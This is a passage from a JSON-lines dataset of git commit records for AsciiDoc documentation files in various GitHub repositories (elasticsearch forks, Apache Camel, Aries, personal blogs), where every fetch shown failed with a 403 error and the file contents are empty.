nxia\/elasticsearch,Chhunlong\/elasticsearch,dataduke\/elasticsearch,polyfractal\/elasticsearch,fekaputra\/elasticsearch,nazarewk\/elasticsearch,rento19962\/elasticsearch,likaiwalkman\/elasticsearch,kevinkluge\/elasticsearch,zeroctu\/elasticsearch,adrianbk\/elasticsearch,wimvds\/elasticsearch,GlenRSmith\/elasticsearch,AshishThakur\/elasticsearch,uschindler\/elasticsearch,easonC\/elasticsearch,dongjoon-hyun\/elasticsearch,kalburgimanjunath\/elasticsearch,weipinghe\/elasticsearch,KimTaehee\/elasticsearch,PhaedrusTheGreek\/elasticsearch,mjhennig\/elasticsearch,Fsero\/elasticsearch,clintongormley\/elasticsearch,fred84\/elasticsearch,sc0ttkclark\/elasticsearch,lightslife\/elasticsearch,jsgao0\/elasticsearch,kaneshin\/elasticsearch,strapdata\/elassandra,davidvgalbraith\/elasticsearch,mcku\/elasticsearch,milodky\/elasticsearch,mcku\/elasticsearch,gingerwizard\/elasticsearch,alexbrasetvik\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lydonchandra\/elasticsearch,snikch\/elasticsearch,bestwpw\/elasticsearch,nrkkalyan\/elasticsearch,mmaracic\/elasticsearch,Shepard1212\/elasticsearch,xingguang2013\/elasticsearch,awislowski\/elasticsearch,easonC\/elasticsearch,likaiwalkman\/elasticsearch,knight1128\/elasticsearch,Kakakakakku\/elasticsearch,Rygbee\/elasticsearch,golubev\/elasticsearch,trangvh\/elasticsearch,djschny\/elasticsearch,hafkensite\/elasticsearch,hafkensite\/elasticsearch,beiske\/elasticsearch,Charlesdong\/elasticsearch,nellicus\/elasticsearch,sauravmondallive\/elasticsearch,jeteve\/elasticsearch,Helen-Zhao\/elasticsearch,bawse\/elasticsearch,KimTaehee\/elasticsearch,jeteve\/elasticsearch,tkssharma\/elasticsearch,fernandozhu\/elasticsearch,mute\/elasticsearch,tahaemin\/elasticsearch,elancom\/elasticsearch,nrkkalyan\/elasticsearch,wbowling\/elasticsearch,wuranbo\/elasticsearch,franklanganke\/elasticsearch,yuy168\/elasticsearch,Widen\/elasticsearch,ulkas\/elasticsearch,socialrank\/elasticsearch,jprante\/elasticsearch,F0lha\/elasticsearch,apepper\/elasticsearch,artnowo\/elasticsearch,linglaiyao1314\/elasticsearch,wbowling\/elasticsearch,caengcjd\/elasticsearch,tahaemin\/elasticsearch,nellicus\/elasticsearch,dpursehouse\/elasticsearch,mcku\/elasticsearch,mikemccand\/elasticsearch,MisterAndersen\/elasticsearch,koxa29\/elasticsearch,mrorii\/elasticsearch,xingguang2013\/elasticsearch,Stacey-Gammon\/elasticsearch,naveenhooda2000\/elasticsearch,kingaj\/elasticsearch,pozhidaevak\/elasticsearch,maddin2016\/elasticsearch,Brijeshrpatel9\/elasticsearch,dpursehouse\/elasticsearch,rlugojr\/elasticsearch,ESamir\/elasticsearch,kunallimaye\/elasticsearch,ImpressTV\/elasticsearch,beiske\/elasticsearch,huanzhong\/elasticsearch,xpandan\/elasticsearch,vietlq\/elasticsearch,camilojd\/elasticsearch,sauravmondallive\/elasticsearch,schonfeld\/elasticsearch,martinstuga\/elasticsearch,Collaborne\/elasticsearch,s1monw\/elasticsearch,HarishAtGitHub\/elasticsearch,huypx1292\/elasticsearch,tebriel\/elasticsearch,kcompher\/elasticsearch,karthikjaps\/elasticsearch,yongminxia\/elasticsearch,kaneshin\/elasticsearch,loconsolutions\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,acchen97\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,wangyuxue\/elasticsearch,i-am-Nathan\/elasticsearch,maddin2016\/elasticsearch,springning\/elasticsearch,caengcjd\/elasticsearch,fforbeck\/elasticsearch,sneivandt\/elasticsearch,mnylen\/elasticsearch,khiraiwa\/elasticsearch,Stacey-Gammon\/elasticsearch,Rygbee\/elasticsearch,ydsakyclguozi\/elasticsearch,mjhennig\/elasticsearch,sc0ttkclark\/elasticsearch,overcome\/elasticsearch,golubev\/elasticsearch,springning\/elasticsearch,onegambler\/elasticsearch,tkssharma\/elasticsearch,mohit\/elasticsearch,onegambler\/elasticsearch,liweinan0423\/elasticsearch,AndreKR\/elasticsearch,Helen-Zhao\/elasticsearch,yongminxia\/elasticsearch,lightslife\/elasticsearch,Siddartha07\/elasticsearch,huanzhong\/elasticsearch,adrianbk\/elasticsearch,rento19962\/elasticsearch,zhiqinghuang\/elasticsearch,iamjakob\/elasticsearch,polyfractal\/elasticsearch,martinstuga\/elasticsearch,zhiqinghuang\/elasticsearch,mortonsykes\/elasticsearch,tahaemin\/elasticsearch,coding0011\/elasticsearch,humandb\/elasticsearch,pozhidaevak\/elasticsearch,nrkkalyan\/elasticsearch,AshishThakur\/elasticsearch,fernandozhu\/elasticsearch,hydro2k\/elasticsearch,smflorentino\/elasticsearch,tsohil\/elasticsearch,slavau\/elasticsearch,iacdingping\/elasticsearch,shreejay\/elasticsearch,rmuir\/elasticsearch,lightslife\/elasticsearch,huanzhong\/elasticsearch,rlugojr\/elasticsearch,tebriel\/elasticsearch,YosuaMichael\/elasticsearch,AshishThakur\/elasticsearch,fernandozhu\/elasticsearch,HarishAtGitHub\/elasticsearch,lydonchandra\/elasticsearch,diendt\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,iamjakob\/elasticsearch,MichaelLiZhou\/elasticsearch,adrianbk\/elasticsearch,mgalushka\/elasticsearch,markwalkom\/elasticsearch,lchennup\/elasticsearch,btiernay\/elasticsearch,mjhennig\/elasticsearch,ouyangkongtong\/elasticsearch,karthikjaps\/elasticsearch,fforbeck\/elasticsearch,cnfire\/elasticsearch-1,scorpionvicky\/elasticsearch,StefanGor\/elasticsearch,nilabhsagar\/elasticsearch,jsgao0\/elasticsearch,ydsakyclguozi\/elasticsearch,pozhidaevak\/elasticsearch,C-Bish\/elasticsearch,gfyoung\/elasticsearch,huypx1292\/elasticsearch,uschindler\/elasticsearch,aglne\/elasticsearch,GlenRSmith\/elasticsearch,brandonkearby\/elasticsearch,umeshdangat\/elasticsearch,sneivandt\/elasticsearch,andrejserafim\/elasticsearch,fekaputra\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,glefloch\/elasticsearch,episerver\/elasticsearch,iacdingping\/elasticsearch,mikemccand\/elasticsearch,strapdata\/elassandra5-rc,lks21c\/elasticsearch,Fsero\/elasticsearch,jprante\/elasticsearch,pritishppai\/elasticsearch,avikurapati\/elasticsearch,andrejserafim\/elasticsearch,MjAbuz\/elasticsearch,rlugojr\/elasticsearch,andrejserafim\/elasticsearch,elasticdog\/elasticsearch,slavau\/elasticsearch,Shekharrajak\/elasticsearch,SergVro\/elasticsearch,kunallimaye\/elasticsearch,infusionsoft\/elasticsearch,MetSystem\/elasticsearch,a2lin\/elasticsearch,lzo\/elasticsearch-1,PhaedrusTheGreek\/elasticsearch,YosuaMichael\/elasticsearch,mmaracic\/elasticsearch,khiraiwa\/elasticsearch,mm0\/elasticsearch,kunallimaye\/elasticsearch,rhoml\/elasticsearch,Ansh90\/elasticsearch,gingerwizard\/elasticsearch,MjAbuz\/elasticsearch,pablocastro\/elasticsearch,gfyoung\/elasticsearch,fekaputra\/elasticsearch,Uiho\/elasticsearch,lzo\/elasticsearch-1,iantruslove\/elasticsearch,LewayneNaidoo\/elasticsearch,MichaelLiZhou\/elasticsearch,NBSW\/elasticsearch,humandb\/elasticsearch,PhaedrusTheGreek\/elasticsearch,vvcephei\/elasticsearch,springning\/elasticsearch,truemped\/elasticsearch,pablocastro\/elasticsearch,ImpressTV\/elasticsearch,Widen\/elasticsearch,xingguang2013\/elasticsearch,achow\/elasticsearch,caengcjd\/elasticsearch,xingguang2013\/elasticsearch,thecocce\/elasticsearch,wayeast\/elasticsearch,areek\/elasticsearch,jeteve\/elasticsearch,JackyMai\/elasticsearch,awislowski\/elasticsearch,kingaj\/elasticsearch,wenpos\/elasticsearch,wangyuxue\/elasticsearch,davidvgalbraith\/elasticsearch,khiraiwa\/elasticsearch,skearns64\/elasticsearch,vroyer\/elassandra,clintongormley\/elasticsearch,nezirus\/elasticsearch,lightslife\/elasticsearch,kalimatas\/elasticsearch,avikurapati\/elasticsearch,mmaracic\/elasticsearch,kenshin233\/elasticsearch,TonyChai24\/ESSource,loconsolutions\/elasticsearch,lchennup\/elasticsearch,bestwpw\/elasticsearch,alexbrasetvik\/elasticsearch,mapr\/elasticsearch,skearns64\/elasticsearch,mortonsykes\/elasticsearch,markllama\/elasticsearch,18098924759\/elasticsearch,mcku\/elasticsearch,Charlesdong\/elasticsearch,drewr\/elasticsearch,nrkkalyan\/elasticsearch,Stacey-Gammon\/elasticsearch,fooljohnny\/elasticsearch,himanshuag\/elasticsearch,andrejserafim\/elasticsearch,mohit\/elasticsearch,hechunwen\/elasticsearch,TonyChai24\/ESSource,yuy168\/elasticsearch,palecur\/elasticsearch,hirdesh2008\/elasticsearch,EasonYi\/elasticsearch,mohit\/elasticsearch,zeroctu\/elasticsearch,girirajsharma\/elasticsearch,Siddartha07\/elasticsearch,trangvh\/elasticsearch,wittyameta\/elasticsearch,AshishThakur\/elasticsearch,jsgao0\/elasticsearch,vvcephei\/elasticsearch,sposam\/elasticsearch,socialrank\/elasticsearch,hanswang\/elasticsearch,chirilo\/elasticsearch,qwerty4030\/elasticsearch,rlugojr\/elasticsearch,artnowo\/elasticsearch,jimhooker2002\/elasticsearch,YosuaMichael\/elasticsearch,palecur\/elasticsearch,phani546\/elasticsearch,18098924759\/elasticsearch,StefanGor\/elasticsearch,mnylen\/elasticsearch,rento19962\/elasticsearch,mohit\/elasticsearch,rento19962\/elasticsearch,jbertouch\/elasticsearch,vvcephei\/elasticsearch,dylan8902\/elasticsearch,huanzhong\/elasticsearch,sdauletau\/elasticsearch,jango2015\/elasticsearch,markharwood\/elasticsearch,golubev\/elasticsearch,weipinghe\/elasticsearch,mikemccand\/elasticsearch,fooljohnny\/elasticsearch,Collaborne\/elasticsearch,queirozfcom\/elasticsearch,vvcephei\/elasticsearch,andrejserafim\/elasticsearch,coding0011\/elasticsearch,spiegela\/elasticsearch,ulkas\/elasticsearch,hydro2k\/elasticsearch,MjAbuz\/elasticsearch,yanjunh\/elasticsearch,rmuir\/elasticsearch,apepper\/elasticsearch,jpountz\/elasticsearch,girirajsharma\/elasticsearch,mrorii\/elasticsearch,lks21c\/elasticsearch,cnfire\/elasticsearch-1,Liziyao\/elasticsearch,easonC\/elasticsearch,socialrank\/elasticsearch,AndreKR\/elasticsearch,jimhooker2002\/elasticsearch,hirdesh2008\/elasticsearch,Ansh90\/elasticsearch,IanvsPoplicola\/elasticsearch,coding0011\/elasticsearch,caengcjd\/elasticsearch,adrianbk\/elasticsearch,mrorii\/elasticsearch,wimvds\/elasticsearch,s1monw\/elasticsearch,infusionsoft\/elasticsearch,hechunwen\/elasticsearch,myelin\/elasticsearch,clintongormley\/elasticsearch,kevinkluge\/elasticsearch,mbrukman\/elasticsearch,jango2015\/elasticsearch,alexshadow007\/elasticsearch,HonzaKral\/elasticsearch,acchen97\/elasticsearch,TonyChai24\/ESSource,SaiprasadKrishnamurthy\/elasticsearch,springning\/elasticsearch,sreeramjayan\/elasticsearch,skearns64\/elasticsearch,xuzha\/elasticsearch,djschny\/elasticsearch,jimczi\/elasticsearch,schonfeld\/elasticsearch,nrkkalyan\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,brandonkearby\/elasticsearch,javachengwc\/elasticsearch,lmtwga\/elasticsearch,btiernay\/elasticsearch,wimvds\/elasticsearch,Collaborne\/elasticsearch,JSCooke\/elasticsearch,adrianbk\/elasticsearch,yynil\/elasticsearch,ImpressTV\/elasticsearch,alexkuk\/elasticsearch,hydro2k\/elasticsearch,jsgao0\/elasticsearch,lmtwga\/elasticsearch,mute\/elasticsearch,likaiwalkman\/elasticsearch,cwurm\/elasticsearch,jchampion\/elasticsearch,hanswang\/elasticsearch,hechunwen\/elasticsearch,jchampion\/elasticsearch,njlawton\/elasticsearch,ricardocerq\/elasticsearch,ckclark\/elasticsearch,linglaiyao1314\/elasticsearch,kaneshin\/elasticsearch,KimTaehee\/elasticsearch,jchampion\/elasticsearch,chirilo\/elasticsearch,amit-shar\/elasticsearch,szroland\/elasticsearch,alexkuk\/elasticsearch,Widen\/elasticsearch,vietlq\/elasticsearch,yuy168\/elasticsearch,nilabhsagar\/elasticsearch,lks21c\/elasticsearch,nknize\/elasticsearch,ZTE-PaaS\/elasticsearch,lzo\/elasticsearch-1,knight1128\/elasticsearch,sarwarbhuiyan\/elasticsearch,nomoa\/elasticsearch,lks21c\/elasticsearch,mapr\/elasticsearch,diendt\/elasticsearch,xuzha\/elasticsearch,mohit\/elasticsearch,davidvgalbraith\/elasticsearch,bestwpw\/elasticsearch,ulkas\/elasticsearch,SergVro\/elasticsearch,wbowling\/elasticsearch,sdauletau\/elasticsearch,scottsom\/elasticsearch,Liziyao\/elasticsearch,strapdata\/elassandra5-rc,mute\/elasticsearch,andrestc\/elasticsearch,kunallimaye\/elasticsearch,mm0\/elasticsearch,uschindler\/elasticsearch,JackyMai\/elasticsearch,linglaiyao1314\/elasticsearch,chirilo\/elasticsearch,bawse\/elasticsearch,kimimj\/elasticsearch,fooljohnny\/elasticsearch,geidies\/elasticsearch,szroland\/elasticsearch,amit-shar\/elasticsearch,wenpos\/elasticsearch,skearns64\/elasticsearch,PhaedrusTheGreek\/elasticsearch,queirozfcom\/elasticsearch,C-Bish\/elasticsearch,achow\/elasticsearch,Helen-Zhao\/elasticsearch,jbertouch\/elasticsearch,ZTE-PaaS\/elasticsearch,episerver\/elasticsearch,mgalushka\/elasticsearch,petabytedata\/elasticsearch,hechunwen\/elasticsearch,abibell\/elasticsearch,kalburgimanjunath\/elasticsearch,diendt\/elasticsearch,ckclark\/elasticsearch,caengcjd\/elasticsearch,tsohil\/elasticsearch,sneivandt\/elasticsearch,Chhunlong\/elasticsearch,iacdingping\/elasticsearch,ydsakyclguozi\/elasticsearch,ulkas\/elasticsearch,abibell\/elasticsearch,MaineC\/elasticsearch,dpursehouse\/elasticsearch,nellicus\/elasticsearch,nezirus\/elasticsearch,likaiwalkman\/elasticsearch,mbrukman\/elasticsearch,mjhennig\/elasticsearch,robin13\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,dataduke\/elasticsearch,shreejay\/elasticsearch,girirajsharma\/elasticsearch,sposam\/elasticsearch,geidies\/elasticsearch,Liziyao\/elasticsearch,mmaracic\/elasticsearch,huanzhong\/elasticsearch,sposam\/elasticsearch,nomoa\/elasticsearch,tahaemin\/elasticsearch,masterweb121\/elasticsearch,nezirus\/elasticsearch,ricardocerq\/elasticsearch,slavau\/elasticsearch,wimvds\/elasticsearch,jimczi\/elasticsearch,clintongormley\/elasticsearch,masterweb121\/elasticsearch,martinstuga\/elasticsearch,markharwood\/elasticsearch,ThalaivaStars\/OrgRepo1,lchennup\/elasticsearch,sposam\/elasticsearch,robin13\/elasticsearch,artnowo\/elasticsearch,mute\/elasticsearch,lchennup\/elasticsearch,F0lha\/elasticsearch,trangvh\/elasticsearch,dylan8902\/elasticsearch,maddin2016\/elasticsearch,karthikjaps\/elasticsearch,bestwpw\/elasticsearch,lzo\/elasticsearch-1,myelin\/elasticsearch,sarwarbhuiyan\/elasticsearch,humandb\/elasticsearch,achow\/elasticsearch,sc0ttkclark\/elasticsearch,camilojd\/elasticsearch,truemped\/elasticsearch,chirilo\/elasticsearch,markharwood\/elasticsearch,milodky\/elasticsearch,strapdata\/elassandra-test,btiernay\/elasticsearch,wittyameta\/elasticsearch,mmaracic\/elasticsearch,amaliujia\/elasticsearch,mgalushka\/elasticsearch,szroland\/elasticsearch,ulkas\/elasticsearch,jeteve\/elasticsearch,vingupta3\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mortonsykes\/elasticsearch,djschny\/elasticsearch,himanshuag\/elasticsearch,jimczi\/elasticsearch,tsohil\/elasticsearch,gingerwizard\/elasticsearch,alexshadow007\/elasticsearch,pozhidaevak\/elasticsearch,scottsom\/elasticsearch,sposam\/elasticsearch,rhoml\/elasticsearch,MichaelLiZhou\/elasticsearch,IanvsPoplicola\/elasticsearch,vroyer\/elasticassandra,nomoa\/elasticsearch,F0lha\/elasticsearch,khiraiwa\/elasticsearch,lydonchandra\/elasticsearch,rmuir\/elasticsearch,weipinghe\/elasticsearch,liweinan0423\/elasticsearch,alexbrasetvik\/elasticsearch,schonfeld\/elasticsearch,drewr\/elasticsearch,Brijeshrpatel9\/elasticsearch,gfyoung\/elasticsearch,elancom\/elasticsearch","old_file":"docs\/reference\/aggregations\/bucket\/filter-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/bucket\/filter-aggregation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c502a08f27b247be88524c1ee238f4ef182fffa","subject":"y2b create post Supercharge Any USB Port!","message":"y2b create post Supercharge Any USB Port!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-03-Supercharge-Any-USB-Port.adoc","new_file":"_posts\/2016-06-03-Supercharge-Any-USB-Port.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c5cea3c9630b6b72a319063590ebd2e23f2cfee","subject":"Update 2016-12-09-Azure-Machine-Learning-2.adoc","message":"Update 2016-12-09-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2016-12-09-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"026882b538b63c55e7036de0af60ab31a82950bb","subject":"[doc] Add description of HOWL log internals","message":"[doc] Add description of HOWL log internals\n\ngit-svn-id: f3027bd689517dd712b868b0d3f5f59c3162b83d@1794325 13f79535-47bb-0310-9956-ffa450edef68\n","repos":"alien11689\/aries,apache\/aries,rotty3000\/aries,graben\/aries,apache\/aries,graben\/aries,graben\/aries,alien11689\/aries,alien11689\/aries,apache\/aries,alien11689\/aries,rotty3000\/aries,graben\/aries,rotty3000\/aries,apache\/aries,rotty3000\/aries","old_file":"transaction\/transaction-manager\/internals.adoc","new_file":"transaction\/transaction-manager\/internals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alien11689\/aries.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b280d4738e3a8552addbc38056a894f43527d0f","subject":"Update 03_task_publishToConfluence.adoc","message":"Update 03_task_publishToConfluence.adoc\n\nfix typo","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/03_task_publishToConfluence.adoc","new_file":"src\/docs\/manual\/03_task_publishToConfluence.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2973c4012362b17bfe2039fdcafa4fa573e8bb09","subject":":memo: iView Setup","message":":memo: iView Setup\n","repos":"syon\/refills","old_file":"src\/refills\/nuxt\/iview-setup.adoc","new_file":"src\/refills\/nuxt\/iview-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"453348192ba3ef4436bac05905a4f55918ecd810","subject":"Update 2016-01-20-Which-external-storage-device-should-you-be-using-in-2016.adoc","message":"Update 2016-01-20-Which-external-storage-device-should-you-be-using-in-2016.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2016-01-20-Which-external-storage-device-should-you-be-using-in-2016.adoc","new_file":"_posts\/2016-01-20-Which-external-storage-device-should-you-be-using-in-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8562a57488b2f150f33088908686fc876c754fb1","subject":"Added Stream Config EIP base docs","message":"Added Stream Config EIP base docs\n","repos":"apache\/camel,tdiesler\/camel,tadayosi\/camel,gnodet\/camel,onders86\/camel,davidkarlsen\/camel,snurmine\/camel,tadayosi\/camel,jamesnetherton\/camel,DariusX\/camel,zregvart\/camel,pmoerenhout\/camel,isavin\/camel,adessaigne\/camel,anoordover\/camel,ullgren\/camel,cunningt\/camel,sverkera\/camel,isavin\/camel,davidkarlsen\/camel,sverkera\/camel,objectiser\/camel,jamesnetherton\/camel,cunningt\/camel,rmarting\/camel,jonmcewen\/camel,Fabryprog\/camel,objectiser\/camel,pmoerenhout\/camel,rmarting\/camel,christophd\/camel,akhettar\/camel,mcollovati\/camel,Fabryprog\/camel,dmvolod\/camel,curso007\/camel,jonmcewen\/camel,davidkarlsen\/camel,curso007\/camel,Fabryprog\/camel,gnodet\/camel,tdiesler\/camel,kevinearls\/camel,christophd\/camel,alvinkwekel\/camel,nicolaferraro\/camel,isavin\/camel,akhettar\/camel,jamesnetherton\/camel,dmvolod\/camel,pax95\/camel,anoordover\/camel,adessaigne\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,ullgren\/camel,rmarting\/camel,nikhilvibhav\/camel,cunningt\/camel,punkhorn\/camel-upstream,gautric\/camel,nicolaferraro\/camel,rmarting\/camel,gnodet\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,onders86\/camel,pmoerenhout\/camel,objectiser\/camel,kevinearls\/camel,cunningt\/camel,adessaigne\/camel,pax95\/camel,curso007\/camel,gautric\/camel,zregvart\/camel,rmarting\/camel,tadayosi\/camel,DariusX\/camel,DariusX\/camel,curso007\/camel,christophd\/camel,christophd\/camel,pax95\/camel,apache\/camel,tdiesler\/camel,adessaigne\/camel,kevinearls\/camel,tdiesler\/camel,tadayosi\/camel,CodeSmell\/camel,CodeSmell\/camel,kevinearls\/camel,onders86\/camel,akhettar\/camel,pax95\/camel,anoordover\/camel,pax95\/camel,gautric\/camel,gnodet\/camel,onders86\/camel,tdiesler\/camel,jonmcewen\/camel,anoordover\/camel,akhettar\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,apache\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,sverkera\/camel,jonmcewen\/camel,sverkera\/camel,isavin\/camel,kevinearls\/camel,alvinkwekel\/camel,CodeSmell\/camel,snurmine\/camel,jonmcewen\/camel,snurmine\/camel,jonmcewen\/camel,anoordover\/camel,akhettar\/camel,jamesnetherton\/camel,akhettar\/camel,CodeSmell\/camel,snurmine\/camel,ullgren\/camel,mcollovati\/camel,apache\/camel,cunningt\/camel,zregvart\/camel,curso007\/camel,dmvolod\/camel,apache\/camel,jamesnetherton\/camel,snurmine\/camel,nicolaferraro\/camel,Fabryprog\/camel,onders86\/camel,zregvart\/camel,objectiser\/camel,onders86\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,sverkera\/camel,sverkera\/camel,DariusX\/camel,christophd\/camel,tadayosi\/camel,adessaigne\/camel,curso007\/camel,dmvolod\/camel,apache\/camel,anoordover\/camel,jamesnetherton\/camel,isavin\/camel,mcollovati\/camel,dmvolod\/camel,tadayosi\/camel,pax95\/camel,mcollovati\/camel,tdiesler\/camel,punkhorn\/camel-upstream,dmvolod\/camel,christophd\/camel,pmoerenhout\/camel,gautric\/camel,pmoerenhout\/camel,cunningt\/camel,kevinearls\/camel,rmarting\/camel,ullgren\/camel,isavin\/camel,gautric\/camel,gautric\/camel,gnodet\/camel,snurmine\/camel,adessaigne\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/stream-config-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/stream-config-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ba5287091b6b2d291146b598f1a68daa1a99217","subject":"Update 2015-12-23-Python-Static-Instance-variable.adoc","message":"Update 2015-12-23-Python-Static-Instance-variable.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-23-Python-Static-Instance-variable.adoc","new_file":"_posts\/2015-12-23-Python-Static-Instance-variable.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee08427a7ef9a262aba51b6398a29e53dba0a039","subject":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","message":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0173a18fa269f3efb79e4d00fac5a771fe51bf2e","subject":"experiment with asciidoc","message":"experiment with asciidoc\n","repos":"alphagov\/govuk-puppet,alphagov\/govuk-puppet,alphagov\/govuk-puppet,alphagov\/govuk-puppet,alphagov\/govuk-puppet,alphagov\/govuk-puppet","old_file":"STANDARDS.asciidoc","new_file":"STANDARDS.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alphagov\/govuk-puppet.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b714fa21be37949e4882d1d8a6546526e39981c0","subject":"start adding documentation","message":"start adding documentation\n","repos":"scottmarlow\/wildfly-nosql","old_file":"doc\/README.adoc","new_file":"doc\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottmarlow\/wildfly-nosql.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e386737e674a3ea1b7c659d2cb8b93ef9b32c42","subject":"put kryo in the attic, will implement Avro soon instead.","message":"put kryo in the attic, will implement Avro soon instead.\n","repos":"microserviceux\/muon-java,microserviceux\/muon-java","old_file":"attic\/README.adoc","new_file":"attic\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/microserviceux\/muon-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"79a177fcad0ce0a6a995981f6e5d836e436d639a","subject":"added introduction, TOC and numbered paragraphs","message":"added introduction, TOC and numbered paragraphs\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"66272fa9a04040088d153858894bcbb07c4429d0","subject":"y2b create post Iron Man S6 Edge Unboxing!","message":"y2b create post Iron Man S6 Edge Unboxing!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-06-05-Iron-Man-S6-Edge-Unboxing.adoc","new_file":"_posts\/2015-06-05-Iron-Man-S6-Edge-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30598003e90b95af713822dad3a8ae2841a0fd1c","subject":"Update 2016-01-06-Study-with-Data-Structure.adoc","message":"Update 2016-01-06-Study-with-Data-Structure.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2016-01-06-Study-with-Data-Structure.adoc","new_file":"_posts\/2016-01-06-Study-with-Data-Structure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09ea73b4fa3749ec46b630cd1e1cd17c29514623","subject":"Update 2016-07-31-How-to-be-more-productive.adoc","message":"Update 